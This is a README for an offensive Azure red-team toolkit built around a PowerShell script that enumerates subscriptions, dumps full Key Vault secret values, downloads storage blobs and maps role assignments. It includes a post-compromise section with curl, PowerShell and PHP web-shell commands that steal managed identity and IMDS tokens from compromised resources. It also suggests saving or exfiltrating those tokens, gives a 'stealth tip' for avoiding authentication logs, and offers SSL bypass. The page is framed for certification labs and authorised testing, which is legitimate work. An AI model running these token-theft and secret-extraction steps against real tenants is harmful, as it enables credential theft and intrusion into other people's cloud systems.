🚀 Azure ARM Enumeration Toolkit

Simple automation for Azure ARM enumeration using tokens

⚠️ DEVELOPMENT WARNING

This toolkit is currently in its initial development phase and was created using AI assistance (~90%). While functional, you may encounter errors, incomplete information retrieval, or unexpected behavior. These scripts are provided as-is for educational and testing purposes.

Known limitations:

May not retrieve all expected information in complex environments
Token validation and error handling still being refined
Some edge cases may cause script failures
Authentication flows may require manual intervention in certain scenarios

We welcome contributions! 🤝 If you encounter issues or have improvements, please feel free to create pull requests to help make this toolkit more robust and reliable for the community.

🎯 What's This About?

Some scripts to automate enumeration of Azure ARM resources using tokens or current logged user. Useful for CARTP certification, Azure Red Team Labs from Altered Security or Red Teams.

🚀 Quick Start - Authentication Cheat Sheet

Method	Prompts?	Best For	Command
🎯 Token (No Prompts)	❌	CTF/Automation	`.\Enum-AzureARM.ps1 -AccessTokenARM $token -AccountId $user`
🔐 Service Principal (No Prompts)	❌	Red Team/Automation	`.\Enum-AzureARM.ps1 -UseServicePrincipal -ApplicationId $id -ClientSecret $secret -TenantId $tenant`
👤 Current User (Interactive)	✅	Manual Testing	`.\Enum-AzureARM.ps1 -UseCurrentUser`

Get Tokens:

# Azure CLI ARM Token
$armToken = (az account get-access-token --resource=https://management.azure.com/ | ConvertFrom-Json).accessToken

# Azure CLI Graph Token  
$graphToken = (az account get-access-token --resource=https://graph.microsoft.com --output json | ConvertFrom-Json).accessToken

Basically, if you're tired of enumerating resources using Powershell and AZ Cli, or you face a CTF or you simple want to see the different resources that can be accesed using a token without a lot of manual commands, you've come to the right place. These scripts will make you look smart at parties (the kind of parties where people discuss PowerShell... so, very exclusive parties).

🔥 The Star of the Show

🎪 Enum-AzureARM.ps1 - The Azure Whisperer

This magnificent beast of a script will enumerate Azure resources faster than you can say "unauthorized access". It's like having X-ray vision for Azure subscriptions, but legal (Ensure you have explicit permission).

What it does:

🕵️ Finds ALL the things: VMs, Storage Accounts, Key Vaults, Web Apps, Function Apps, and more
🔐 Extract Key Vault secrets with dedicated OAuth tokens and full values (not truncated like other tools)
💾 Enhanced blob downloads with OAuth-based enumeration, smart diagnostics, and 5-tier authentication system
🔍 Smart Storage enumeration - lists containers even without Storage tokens, provides helpful guidance for blob access
🛠️ Advanced token diagnostics - JWT analysis, scope validation, and comprehensive troubleshooting guidance
🤖 Automatic AccountId extraction - extracts user identity from Graph tokens automatically (upn → unique_name → preferred_username → email)
📸 User photo download - automatically detects and downloads user profile photos with proper naming convention
👥 Maps role assignments like a social network stalker (with principal name resolution)
📊 Generates beautiful reports that will make your boss think you're a wizard
🎭 Multiple authentication methods including advanced service principal support
🚀 Automatic resource token acquisition (Storage + Key Vault tokens) in service principal mode
�️ Smart subscription management with test subscription detection and interactive selection ⭐ NEW!
�🚫 SSL bypass capabilities for those special CTF moments when certificates are more like suggestions
🗣️ Verbose output with smart error handling and guidance for manual token retrieval
🎯 CTF/Red Team optimized with comprehensive enumeration and cross-resource correlation

How to use it like a pro:

🔐 Authentication Methods & Behavior

⚠️ IMPORTANT: As of the latest update, the script now implements smart authentication behavior - subscription selection is only prompted when using -UseCurrentUser. Token-based and service principal authentication proceed directly with available privileges.

🎯 Authentication Behavior Summary

Authentication Method	Subscription Selection	Behavior
Token-Based (`-AccessTokenARM`/`-AccessTokenGraph`)	❌ No Prompts	Proceeds directly with token privileges
Service Principal (`-UseServicePrincipal`)	❌ No Prompts	Uses service principal's available access
Current User (`-UseCurrentUser`)	✅ Interactive	Prompts for subscription selection when multiple available

1. Current User Authentication (The "I'm already logged in" approach)

Perfect for when you've already authenticated with Azure PowerShell or Azure CLI:

# Basic enumeration with existing credentials
.\Enum-AzureARM.ps1 -UseCurrentUser

# Verbose mode - see everything that's happening
.\Enum-AzureARM.ps1 -UseCurrentUser -Verbose

# Graph-only enumeration (when no ARM subscription access available)
.\Enum-AzureARM.ps1 -UseCurrentUser -AllowNoSubscription

Behavior: Interactive subscription selection menu appears when multiple subscriptions are available.

2. Service Principal Authentication 🚀 [RECOMMENDED FOR CTF/RED TEAM - NO PROMPTS]

The crown jewel of authentication methods. When you have service principal credentials, this is your best friend. Proceeds directly with enumeration - no subscription selection prompts!

Azure PowerShell Service Principal (Enhanced Mode)

# Enhanced service principal with automatic resource token acquisition
.\Enum-AzureARM.ps1 -UseServicePrincipal `
                    -ApplicationId "12345678-1234-1234-1234-123456789abc" `
                    -ClientSecret "ABC123XyZ456DefGhi789JklMno012PqrStu" `
                    -TenantId "87654321-4321-4321-4321-cba987654321"

# What this gets you automatically:
# ✅ ARM management tokens
# ✅ Microsoft Graph tokens  
# ✅ Storage account tokens (https://storage.azure.com/)
# ✅ Key Vault tokens (https://vault.azure.net/)
# ✅ Enhanced blob download with 5-tier authentication system
# ✅ Full cross-resource enumeration capabilities

Why Enhanced Mode Rocks:

🎯 Automatic Resource Tokens: No more "403 Forbidden" on storage blobs - gets the right tokens automatically
🛡️ 5-Tier Blob Authentication: Tries multiple methods to download blobs (storage context, keys, OAuth, resource tokens, ARM fallback)
🔍 Comprehensive Access: Enumerates everything from VMs to secrets with proper authentication
🎭 CTF Perfect: Designed for scenarios where you have SP credentials and need maximum access

Azure CLI Service Principal (Standard Mode)

# Method 1: Explicit Azure CLI mode
.\Enum-AzureARM.ps1 -UseAzureCLI `
                    -ServicePrincipalId "12345678-1234-1234-1234-123456789abc" `
                    -ServicePrincipalSecret "ABC123XyZ456DefGhi789JklMno012PqrStu" `
                    -TenantId "87654321-4321-4321-4321-cba987654321"

# Method 2: Direct parameters (auto-detects Azure CLI mode)
.\Enum-AzureARM.ps1 -ServicePrincipalId "12345678-1234-1234-1234-123456789abc" `
                    -ServicePrincipalSecret "ABC123XyZ456DefGhi789JklMno012PqrStu" `
                    -TenantId "87654321-4321-4321-4321-cba987654321"

3. Token-Based Authentication 🎯 [NO PROMPTS - DIRECT ACCESS]

When you already have tokens from other sources. The script automatically extracts tenant ID from JWT token claims and proceeds directly with enumeration - no subscription prompts!

# ARM + Graph tokens (full access) - AccountId auto-extracted from Graph token
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken

# Enhanced enumeration with Storage and Key Vault tokens 🆕
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenStorage $storageToken -AccessTokenKeyVault $kvToken -AccountId $userId

# Interactive subscription selection with tokens
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken -AccountId $userId -ForceSubscriptionSelection

# Just Graph enumeration (AccountId auto-extracted, photos auto-downloaded)
.\Enum-AzureARM.ps1 -AccessTokenGraph $graphToken -GraphOnly

# Just ARM enumeration with Storage enhancement
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenStorage $storageToken -AccountId $userId

# Fully non-interactive (automation)
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken -AccountId $userId -NoInteractiveAuth

# Allow enumeration without subscription (Graph-only mode)
.\Enum-AzureARM.ps1 -AccessTokenGraph $graphToken -AllowNoSubscription

Behavior:

✅ No subscription prompts by default - proceeds directly with token privileges
🔍 JWT parsing - extracts tid (tenant ID) claim for validation
🎯 Direct access - uses whatever subscriptions/resources the token can access
⚡ Automatic mode - perfect for automation and CTF scenarios
🎮 Optional interactive selection - use -ForceSubscriptionSelection to choose different subscriptions

🎯 Real-World Scenarios

CTF/Red Team Scenario

# You found service principal creds in a config file or environment variable
.\Enum-AzureARM.ps1 -UseServicePrincipal `
                    -ApplicationId "a1b2c3d4-e5f6-7890-abcd-ef1234567890" `
                    -ClientSecret "super_secret_key_found_in_config" `
                    -TenantId "tenant-id-from-recon" `
                    -Verbose

# This will:
# 1. Authenticate with the service principal
# 2. Get tokens for ARM, Graph, Storage, and Key Vault
# 3. Enumerate all accessible resources
# 4. Try to download storage blobs with multiple auth methods
# 5. Extract Key Vault secrets if permissions allow
# 6. Generate a comprehensive report

Automation/CI-CD Scenario

# Standard service principal for automation
.\Enum-AzureARM.ps1 -ServicePrincipalId $env:AZURE_CLIENT_ID `
                    -ServicePrincipalSecret $env:AZURE_CLIENT_SECRET `
                    -TenantId $env:AZURE_TENANT_ID `
                    -OutputFormat csv `
                    -OutputFile "Reports\daily-inventory.csv"

Graph-Only Investigation

# When you only need Azure AD enumeration
.\Enum-AzureARM.ps1 -AccessTokenGraph $discoveredGraphToken -GraphOnly -Verbose

🎫 Token Acquisition Methods 🔐 [CTF/RED TEAM ESSENTIAL]

🚀 Azure CLI Token Extraction

When you have access to Azure CLI (perfect for post-compromise scenarios):

ARM Management Token

# PowerShell - ARM token for resource management
$armToken = (az account get-access-token --resource=https://management.azure.com/ | ConvertFrom-Json).accessToken

# Use the token
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccountId "[email protected]"

Microsoft Graph Token

# PowerShell - Graph token for Azure AD enumeration  
$graphToken = (az account get-access-token --resource=https://graph.microsoft.com --output json | ConvertFrom-Json).accessToken

# Use the token
.\Enum-AzureARM.ps1 -AccessTokenGraph $graphToken -GraphOnly

Combined Token Acquisition

# Get all tokens for maximum access 🆕
$armToken = (az account get-access-token --resource=https://management.azure.com/ | ConvertFrom-Json).accessToken
$graphToken = (az account get-access-token --resource=https://graph.microsoft.com --output json | ConvertFrom-Json).accessToken
$storageToken = (az account get-access-token --resource=https://storage.azure.com/ | ConvertFrom-Json).accessToken
$kvToken = (az account get-access-token --resource=https://vault.azure.net/ | ConvertFrom-Json).accessToken
$userId = (az account show --query user.name -o tsv)

# Full enumeration with all tokens for maximum capabilities
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken -AccessTokenStorage $storageToken -AccessTokenKeyVault $kvToken -AccountId $userId -Verbose

🆕 Resource-Specific Token Acquisition

# Storage token for enhanced blob enumeration
$storageToken = (az account get-access-token --resource=https://storage.azure.com/ | ConvertFrom-Json).accessToken

# Key Vault token for enhanced secret access
$kvToken = (az account get-access-token --resource=https://vault.azure.net/ | ConvertFrom-Json).accessToken

# Use with existing ARM token for enhanced storage access
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenStorage $storageToken -AccountId $userId

# Use with Graph token for enhanced Key Vault access
.\Enum-AzureARM.ps1 -AccessTokenGraph $graphToken -AccessTokenKeyVault $kvToken

🕵️ Azure PowerShell Token Extraction

When Azure PowerShell is available:

# Get Graph token from current Azure PowerShell context
$context = Get-AzContext
$armToken = $context.TokenCache.ReadItems() | Where-Object { $_.Resource -eq "https://management.azure.com/" } | Select-Object -First 1 -ExpandProperty AccessToken

# Alternative method using Get-AzAccessToken (Az.Accounts 2.2.0+)
$armToken = (Get-AzAccessToken).Token
$graphToken = (Get-AzAccessToken -ResourceTypeName MSGraph).Token

# Use extracted tokens (AccountId automatically extracted from Graph token)
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken

🎭 Managed Identity Exploitation 🔥 [CTF FAVORITE]

When you compromise a resource with managed identity (VMs, App Services, Function Apps, etc.):

Method 1: Direct cURL (Linux/WSL)

# ARM token via managed identity
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" \
     -H "secret:$IDENTITY_HEADER"

# Graph token via managed identity  
curl "$IDENTITY_ENDPOINT?resource=https://graph.microsoft.com&api-version=2017-09-01" \
     -H "secret:$IDENTITY_HEADER"

Method 2: PowerShell via Web Shell/RCE

# Get ARM token via managed identity endpoint
$response = Invoke-RestMethod -Uri "$env:IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -Headers @{secret="$env:IDENTITY_HEADER"}
$armToken = $response.access_token

# Get Graph token  
$graphResponse = Invoke-RestMethod -Uri "$env:IDENTITY_ENDPOINT?resource=https://graph.microsoft.com&api-version=2017-09-01" -Headers @{secret="$env:IDENTITY_HEADER"}  
$graphToken = $graphResponse.access_token

# Use tokens (save to file or exfiltrate)
"ARM Token: $armToken" | Out-File tokens.txt
"Graph Token: $graphToken" | Add-Content tokens.txt

Method 3: Web Application Exploitation (PHP)

Perfect for when you have RCE on a web application running on App Service:

<?php
// Exploit managed identity via PHP web shell
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"');
?>

Method 4: IMDS Metadata Service (Azure VMs)

For compromised Azure VMs (when IDENTITY_ENDPOINT isn't available):

# ARM token from Azure VM metadata service
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Graph token from Azure VM metadata service
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com"

🔧 Token Validation & Usage

Once you have tokens, validate and use them:

# Quick token validation (check if it works)
$headers = @{ Authorization = "Bearer $armToken" }
$test = Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2022-12-01" -Headers $headers

# Check token claims (decode JWT)
$tokenParts = $armToken.Split('.')
$payload = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($tokenParts[1]))
$claims = $payload | ConvertFrom-Json
Write-Host "Tenant ID: $($claims.tid)"
Write-Host "App ID: $($claims.appid)"  
Write-Host "UPN: $($claims.upn)"

# Use with enumeration script
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccountId $claims.upn -Verbose

🎯 CTF/Red Team Token Scenarios

Scenario 1: Compromised Developer Machine

# Developer has Azure CLI authenticated
$armToken = (az account get-access-token --resource=https://management.azure.com/ | ConvertFrom-Json).accessToken
$graphToken = (az account get-access-token --resource=https://graph.microsoft.com --output json | ConvertFrom-Json).accessToken

# Maximum enumeration (AccountId auto-extracted, photos auto-downloaded)
.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenGraph $graphToken -Verbose

Scenario 2: Compromised Web Application with Managed Identity

# From compromised web shell or RCE
export TOKENS=$(curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER")
echo $TOKENS > /tmp/arm_token.json

# Extract and use token (transfer to attack machine)

Scenario 3: Found Tokens in Configuration/Environment Variables

# Found in config files, environment variables, or source code
$foundArmToken = "eyJ0eXAiOiJKV1QiLCJhbGc..."
$foundGraphToken = "eyJ0eXAiOiJKV1QiLCJhbGc..."

# Direct enumeration - no subscription prompts! AccountId auto-extracted from Graph token
.\Enum-AzureARM.ps1 -AccessTokenARM $foundArmToken -AccessTokenGraph $foundGraphToken

⚠️ Token Security Notes

Tokens expire - typically 1 hour for user tokens, varies for service principals
Scope matters - ensure tokens have appropriate resource audience (https://management.azure.com/ for ARM)
Refresh tokens - if available, can be used to get new access tokens
Stealth tip - token-based enumeration doesn't trigger new authentication events

🎯 Smart Subscription Management ⭐ NEW!

The script now includes intelligent subscription selection and management features:

🛡️ Test Subscription Protection

Automatically detects test/demo/trial subscriptions and warns before using them:

# The script will detect patterns like:
# - "Test Company" (common test subscription name)
# - Any subscription with "test", "demo", "trial" in the name
# - Prompts user for confirmation before proceeding

WARNING: Current Azure context is using subscription 'Test Company' - this appears to be a test/demo subscription
Do you want to continue with this subscription?
Default: No (timeout: 10s) [y/N]

🎮 Interactive Subscription Selection

When multiple subscriptions are available, get a user-friendly menu:

📋 Multiple Azure subscriptions found:
1. Production-Environment (12345678-1234-1234-1234-123456789abc)
2. Development-Testing (87654321-4321-4321-4321-cba987654321)
3. Secure-Environment (11111111-2222-3333-4444-555555555555)
4. Continue without subscription (Graph-only)
0. Exit

Select subscription (1-4, or 0 to exit):

🚫 AllowNoSubscription Parameter

New parameter for Graph-only enumeration when ARM access isn't available:

# When you only have Graph permissions or want to avoid ARM enumeration
.\Enum-AzureARM.ps1 -UseCurrentUser -AllowNoSubscription

# Perfect for scenarios where:
# ✅ You only need Azure AD enumeration (includes photo downloads!)
# ✅ ARM subscription access is denied
# ✅ You want to avoid test/demo subscriptions
# ✅ Compliance requirements restrict ARM access
# ✅ Automatic AccountId extraction works with Graph-only mode

⚡ Smart Timeout Handling

10-second timeout for subscription prompts with clear defaults
User can cancel or select different options anytime
Non-interactive mode support for automated scenarios
Graceful fallback to Graph-only when ARM access fails

🔄 Enhanced User Experience

# The script guides you through subscription selection:
🔍 Discovering available Azure subscriptions...
✅ Selected: Production-Environment (12345678-1234-1234-1234-123456789abc)
🔄 Let's select a different subscription...
⚠️  Timeout reached. Using default: No
🎯 Continuing with Graph-only enumeration...

🚀 Enhanced Service Principal Features

🔥 What Makes Service Principal Mode Special

When you use -UseServicePrincipal with Azure PowerShell, you get superpowers:

🎯 Automatic Resource Token Acquisition

No more "Access Denied" errors on storage blobs! The script automatically gets:

Storage Tokens: https://storage.azure.com/ for blob downloads
Key Vault Tokens: https://vault.azure.net/ for secret extraction
Graph Tokens: https://graph.microsoft.com for Azure AD enumeration
ARM Tokens: https://management.azure.com/ for resource management

🛡️ 5-Tier Blob Download Authentication System

When trying to download storage blobs, the script tries multiple methods:

🔵 Az.Storage Context - Uses Azure PowerShell storage context
🟡 Storage Account Keys - Tries to get and use storage keys directly
🟢 Azure CLI OAuth + Keys - Combines OAuth with key-based access
🟠 Resource-Specific Token - Uses https://storage.azure.com/ token
🔴 ARM Token Fallback - Falls back to ARM management token

📸 Automatic User Photo Download 🆕 NEW!

When using Graph tokens, the script automatically:

Detects user profile photos from Microsoft Graph API
Downloads photos automatically to the Results folder
Proper naming convention: photo_AccountId.jpg (e.g., [email protected])
Binary data handling - ensures downloaded images are valid and uncorrupted
Graceful fallback - continues enumeration if photo download fails

🤖 Automatic AccountId Extraction 🆕 NEW!

No more manual AccountId specification with Graph tokens! The script automatically extracts user identity from JWT token claims:

Priority order: upn → unique_name → preferred_username → email
Seamless experience - just provide the Graph token, AccountId is handled automatically
Fallback support - can still manually specify AccountId if needed
Works with all Graph token types - user tokens, service principal tokens, managed identity tokens

📋 Smart Error Handling & Guidance

If automatic token acquisition fails, the script provides:

Clear guidance on manual token retrieval
Copy-paste commands for getting tokens manually
Alternative methods using PowerShell modules
Specific error context to help troubleshoot

📊 Enhanced Enumeration Capabilities

🔐 Key Vault Deep Dive 🆕 ENHANCED

Lists all Key Vaults in accessible subscriptions
Dedicated Key Vault OAuth token support for enhanced secret access
Priority token usage - uses -AccessTokenKeyVault as highest priority method
Extracts secret names and full secret values (not truncated)
Handles both certificate and key secrets with improved authentication
Multiple token fallback - Key Vault OAuth → CLI-acquired tokens → ARM → Graph
Enhanced error handling with specific permission guidance

💾 Storage Account Comprehensive Scanning 🆕 ENHANCED

Lists all storage accounts and containers (even without Storage token)
OAuth-based blob enumeration with dedicated Storage tokens
Smart container enumeration - lists containers without blob access, provides guidance
Cross-method verification - validates OAuth results with alternative methods
Enhanced progress tracking with real-time container and blob processing feedback
Comprehensive diagnostics - JWT token analysis, scope validation, troubleshooting tips
Multiple authentication fallback - Storage OAuth → Account Key → Azure CLI → PowerShell
Detailed logging of enumeration attempts and specific failure reasons

👥 Role Assignment Analysis

Maps all role assignments across subscriptions
Resolves principal names (users, groups, service principals)
Shows effective permissions and scope
Cross-references with Graph data when available

🎭 Perfect for CTF/Red Team Scenarios

# The "I found service principal creds and want to own everything" approach
.\Enum-AzureARM.ps1 -UseServicePrincipal `
                    -ApplicationId "found-in-config-file" `
                    -ClientSecret "discovered-secret" `
                    -TenantId "target-tenant" `
                    -Verbose

# Alternative: Manual token acquisition for maximum control 🆕
$armToken = (az account get-access-token --resource=https://management.azure.com/ | ConvertFrom-Json).accessToken
$storageToken = (az account get-access-token --resource=https://storage.azure.com/ | ConvertFrom-Json).accessToken
$kvToken = (az account get-access-token --resource=https://vault.azure.net/ | ConvertFrom-Json).accessToken

.\Enum-AzureARM.ps1 -AccessTokenARM $armToken -AccessTokenStorage $storageToken -AccessTokenKeyVault $kvToken -AccountId "[email protected]" -Verbose

# What you get:
# ✅ Complete resource inventory with enhanced authentication
# ✅ OAuth-based blob enumeration with comprehensive diagnostics
# ✅ Enhanced Key Vault secret access with dedicated tokens
# ✅ Smart container enumeration (lists containers even without blob access)
# ✅ Cross-method verification for maximum data retrieval
# ✅ Role assignments and permissions analysis
# ✅ Azure AD user/group enumeration
# ✅ Automatic user photo download (when Graph token available)
# ✅ AccountId auto-extraction from Graph tokens
# ✅ Detailed troubleshooting guidance and next steps

🔧 Troubleshooting Made Easy

The enhanced mode includes built-in diagnostics:

Token validation - Checks if tokens are valid and have required permissions
Permission analysis - Shows what permissions are missing
Alternative methods - Suggests other ways to access resources
Verbose logging - Detailed progress information with -Verbose

🌐 The Supporting Cast

🎯 port-scanner.ps1 - The Network Script Ninja

When you need to know what's alive on a network but don't want to install nmap (or can't because corporate policies hate fun).

# The "knock knock, who's there?" approach
.\port-scanner.ps1 -NetworkRange "192.168.1.0/24"

# The "I have trust issues" approach (scan the ports)
.\port-scanner.ps1 -NetworkRange "10.0.1.1-50" -Ports "22,80,443,3389,5985,5986"

✍️ create-script-without-gui.ps1 - The Script Whisperer

For when you want to create PowerShell scripts but notepad gives you anxiety and ISE is too mainstream or maybe you don't have a GUI to use.

# The "I'm feeling creative" approach
.\create-script-without-gui.ps1 -OutputFile "MyMasterpiece.ps1" -IncludeHeader

🎭 Other Random Utilities

We've also got some other scripts lying around because why not:

Enhanced-CTF-Enumeration.ps1 - For when regular enumeration isn't extra enough
Quick-CTF-Test.ps1 - Quick and dirty testing (emphasis on dirty)
check_credentials.ps1 - Does what it says on the tin
Various other scripts that may or may not work depending on the phase of the moon

🏆 What Makes These Scripts Actually Good

🛡️ They Don't Crash (Much)

Error handling so good it makes Python developers jealous
Input validation that would make your mother proud
Retry logic for when Azure is having a bad day (which is Tuesday)

📚 Documentation That Actually Helps

Help files that don't assume you're a mind reader
Examples that actually work (revolutionary!)
Parameter descriptions written in human language

🎨 User Experience That Doesn't Suck

Progress bars so you know it's not frozen
Color-coded output because we're not savages
Verbose mode for when you need to know what your computer is thinking

📊 Output That Makes Sense

JSON for the APIs, CSV for the spreadsheet warriors
Timestamps because "when did this happen?" is always the first question
Full data because truncation is the enemy of knowledge

🔧 What You Need to Get Started

Minimum Requirements (AKA The Bare Minimum)

PowerShell 5.1+ (if you're still on 2.0, we need to talk)
An Azure account or token (shocking, I know)
Basic reading skills (you're doing great so far!)

Optional But Recommended

Az.Accounts module - for the fancy authentication
Microsoft.Graph module - for when you want to be extra thorough
Coffee - for moral support during long enumeration sessions

🚀 Getting Started (The Easy Way)

Step 1: Get the Scripts

git clone https://github.com/oscarintherocks/Enum-AzureARM.git
# Or download the ZIP like it's 2005

Step 2: Deal with PowerShell's Trust Issues

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
# PowerShell: "I don't trust this script!"
# You: "It's fine, I made it myself"

Step 3: Install the Good Stuff (Optional)

Install-Module Az.Accounts -Force
Install-Module Microsoft.Graph -Force
# Now you're ready to enumerate like a pro

⚠️ Legal Disclaimer (The "Don't Sue Me" Section)

IMPORTANT: Only use these scripts on systems you own or have explicit permission to test. I'm not responsible if you:

Get fired for "testing" your company's production environment
Accidentally enumerate someone else's Azure tenant
Discover your CEO's secret cryptocurrency mining operation
Find out how much money your company actually wastes on Azure

🐛 When Things Go Wrong (Troubleshooting for Humans)

PowerShell Doesn't Trust You

# The nuclear option (use responsibly)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Azure is Being Difficult

"Invalid token" - Your token expired (tokens are like milk, they go bad)
"Access denied" - You need more permissions (ask nicely)
"Rate limited" - Azure is tired, try again later

General "It's Broken" Issues

# The universal fix
Get-Help .\scriptname.ps1 -Examples
# If that doesn't work, try turning it off and on again

🤝 Contributing (If You're Feeling Generous)

Want to make these scripts even better? Here's how not to mess things up:

Don't break existing stuff (revolutionary concept)
Add error handling (because users will always find new ways to break things)
Write help that helps (amazing!)
Test your changes (I know, I know, testing is for mortals)

📈 Version History (The Journey)

Version 2.4 - "The Enhanced Storage & Diagnostics Update" ⭐ LATEST

🔐 Storage & Key Vault Token Support - new -AccessTokenStorage and -AccessTokenKeyVault parameters
🔍 Enhanced Storage OAuth Authentication - OAuth-based blob enumeration with comprehensive error handling
📊 Smart Container Enumeration - lists containers without Storage token, with helpful guidance for blob access
🛠️ Advanced Token Diagnostics - JWT token analysis, scope validation, and troubleshooting guidance
⚡ Cross-Method Verification - validates OAuth results with alternative authentication methods when available
🎯 Comprehensive Progress Tracking - detailed progress indicators for storage account processing
💡 Intelligent User Guidance - proactive tips and troubleshooting suggestions throughout enumeration
🤖 Automatic AccountId Extraction - extracts user identity from Graph tokens automatically (no manual specification needed)
📸 User Photo Download - automatically detects and downloads user profile photos with proper naming and binary handling

Version 2.3 - "The Token Subscription Selection Update"

🎮 Token-Based Subscription Selection - new -ForceSubscriptionSelection parameter
🔧 Enhanced JWT Token Parsing - fixed URL-safe Base64 decoding for Graph tokens
⚡ Flexible Authentication Options - choose between automatic and interactive modes
🎯 Improved User Experience - clear control over subscription selection behavior
📋 Multiple Subscription Support - select specific subscriptions even with tokens
🛠️ Better Error Handling - robust JWT parsing with fallback mechanisms

Version 2.2 - "The Smart Authentication Update"

🎯 Smart Authentication Behavior - subscription selection only for -UseCurrentUser
🔐 JWT Token Parsing - automatic extraction of tid (tenant ID) claims from tokens
⚡ No-Prompt Automation - token and service principal auth proceed directly
🎫 Comprehensive Token Acquisition Guide - Azure CLI, PowerShell, and exploitation methods
🕵️ Managed Identity Exploitation - detailed methods for post-compromise scenarios
📚 Enhanced Documentation - complete authentication behavior reference

Version 2.1 - "The Smart Subscription Update"

🛡️ Smart subscription management with test subscription detection
🎮 Interactive subscription selection menu with timeout handling
🚫 AllowNoSubscription parameter for Graph-only enumeration
⚡ Enhanced error handling - changed Write-Error to Write-Warning for better flow
🔄 Graceful fallback mechanisms when ARM access fails
📋 User-friendly prompts with clear guidance and defaults

Version 2.0 - "The Great Refactoring"

Made everything actually work properly
Added so much error handling it became self-aware
Documentation that doesn't make you cry
SSL bypasses for those special CTF moments
Full secret values because truncation is evil

Version 1.0 - "The Dark Times"

Basic functionality (if you were lucky)
Error handling? What's that?
Documentation written by someone who clearly hated users

📜 License

It's open source, do whatever you want. Just don't blame me when it breaks. For more details read the LICENSE file

🎯 TL;DR - The Cheat Sheet

Script	What It Does	Best Usage
`Enum-AzureARM.ps1`	Comprehensive Azure enumeration	See authentication methods below ⬇️
`port-scanner.ps1`	Network discovery and port scanning	`.\port-scanner.ps1 -NetworkRange "192.168.1.0/24"`
`create-script-without-gui.ps1`	Script creation without GUI	`.\create-script-without-gui.ps1`

🔥 Enum-AzureARM.ps1 - Quick Commands

Scenario	Command	Prompts	Why Use This
Current User	`.\Enum-AzureARM.ps1 -UseCurrentUser`	✅ Interactive	Already logged in with Az/CLI
🚀 CTF/Red Team	`.\Enum-AzureARM.ps1 -UseServicePrincipal -ApplicationId '<ID>' -ClientSecret '<SECRET>' -TenantId '<TENANT>'`	❌ No Prompts	Maximum capabilities + auto tokens
Standard Automation	`.\Enum-AzureARM.ps1 -ServicePrincipalId '<ID>' -ServicePrincipalSecret '<SECRET>' -TenantId '<TENANT>'`	❌ No Prompts	Azure CLI backend
🎯 Token ARM+Graph	`.\Enum-AzureARM.ps1 -AccessTokenARM '<TOKEN>' -AccessTokenGraph '<TOKEN>'`	❌ No Prompts	AccountId auto-extracted + photos downloaded
🆕 Token Full Suite	`.\Enum-AzureARM.ps1 -AccessTokenARM '<ARM>' -AccessTokenStorage '<STORAGE>' -AccessTokenKeyVault '<KV>' -AccountId '<ID>'`	❌ No Prompts	Maximum capabilities with all tokens
🎮 Token + Selection	`.\Enum-AzureARM.ps1 -AccessTokenARM '<TOKEN>' -AccessTokenGraph '<TOKEN>' -AccountId '<ID>' -ForceSubscriptionSelection`	✅ Interactive	Choose subscription with tokens
Token ARM + Storage	`.\Enum-AzureARM.ps1 -AccessTokenARM '<TOKEN>' -AccessTokenStorage '<STORAGE>' -AccountId '<ID>'`	❌ No Prompts	Enhanced storage enumeration
Token Graph + KV	`.\Enum-AzureARM.ps1 -AccessTokenGraph '<TOKEN>' -AccessTokenKeyVault '<KV>'`	❌ No Prompts	Enhanced Key Vault access
Graph Only	`.\Enum-AzureARM.ps1 -AccessTokenGraph '<TOKEN>' -GraphOnly`	❌ No Prompts	Azure AD enumeration + photos downloaded
⭐ No Subscription	`.\Enum-AzureARM.ps1 -UseCurrentUser -AllowNoSubscription`	✅ Interactive	Graph-only + smart subscription handling

🎫 Quick Token Acquisition

Method	Command	Use Case
Azure CLI ARM	`$armToken = (az account get-access-token --resource=https://management.azure.com/ \| ConvertFrom-Json).accessToken`	Post-compromise with Azure CLI
Azure CLI Graph	`$graphToken = (az account get-access-token --resource=https://graph.microsoft.com --output json \| ConvertFrom-Json).accessToken`	Azure AD enumeration token
🆕 Azure CLI Storage	`$storageToken = (az account get-access-token --resource=https://storage.azure.com/ \| ConvertFrom-Json).accessToken`	Enhanced blob enumeration
🆕 Azure CLI Key Vault	`$kvToken = (az account get-access-token --resource=https://vault.azure.net/ \| ConvertFrom-Json).accessToken`	Enhanced secret access
Managed Identity ARM	`curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"`	Compromised Azure resource
🆕 Managed Identity Storage	`curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"`	Compromised resource with Storage access
Web App Exploit	`<?php system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"'); ?>`	RCE on App Service with managed identity

🎯 Pro Tips:

Use -UseServicePrincipal for enhanced blob downloads and automatic resource tokens
